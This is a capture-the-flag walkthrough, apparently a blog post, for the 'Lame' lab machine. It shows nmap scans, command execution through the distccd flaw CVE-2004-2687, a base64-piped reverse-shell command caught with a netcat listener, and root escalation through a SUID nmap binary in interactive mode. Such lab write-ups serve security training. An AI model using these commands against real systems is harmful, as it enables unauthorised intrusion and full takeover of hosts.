Skip to content


Nmap scan

As usual let's start with nmap:

└─$ sudo nmap <MACHINE_IP> -p- --min-rate 1000 -v
Starting Nmap 7.91 ( ) at 2021-09-07 17:49 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.050s latency).
Not shown: 65530 filtered ports
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 104.17 seconds
           Raw packets sent: 131147 (5.770MB) | Rcvd: 84 (3.680KB)
└─$ sudo nmap <MACHINE_IP> -p21,22,139,445,3632 -sC -sV
Starting Nmap 7.91 ( ) at 2021-09-07 17:53 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.050s latency).

21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m31s, deviation: 2h49m43s, median: 30s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name:
|   FQDN:
|_  System time: 2021-09-07T17:54:09-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 53.46 seconds

So we have SSH, FTP, Samba and distccd. That last service is used to send code to be compiled in another computer, I think we can start with it.


Let's check if it is vulnerable to CVE-2004-2687:

└─$ sudo nmap -p 3632 <MACHINE_IP> --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='id'"
Starting Nmap 7.91 ( ) at 2021-09-07 18:00 EDT
Nmap scan report for <MACHINE_IP>
Host is up (0.052s latency).

3632/tcp open  distccd
| distcc-cve2004-2687: 
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|     Disclosure date: 2002-02-01
|     Extra information:
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|     References:

Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds

In fact it is! We have RCE, that was fast. Next step is to get a shell.

Reverse shell

I just base64 encoded a Python reverse shell payload and used an implementation of the vulnerability in Python to send it:

./ -t <MACHINE_IP> -p 3632 -c "echo <BASE64_REVSHELL> | base64 -d | bash"
└─$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [] from (UNKNOWN) [<MACHINE_IP>] 44031
sh: no job control in this shell

The user flag is under /home/makis/user.txt

Privilege escalation

Once in the box we can start checking for escalation vectors. After some digging i found that the nmap binary has the SUID bit set and is owned by root:

daemon@lame:/$ find / -perm /4000 2> /dev/null
daemon@lame:/$ ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap

To abuse this, we can simply execute nmap --interactive and then execute a system command. That system command will be executed as root so we can become root now:

daemon@lame:/tmp$ nmap --interactive

Starting Nmap V. 4.53 ( )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !bash -p
bash-3.2# id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)

The root flag is under /root/root.txt.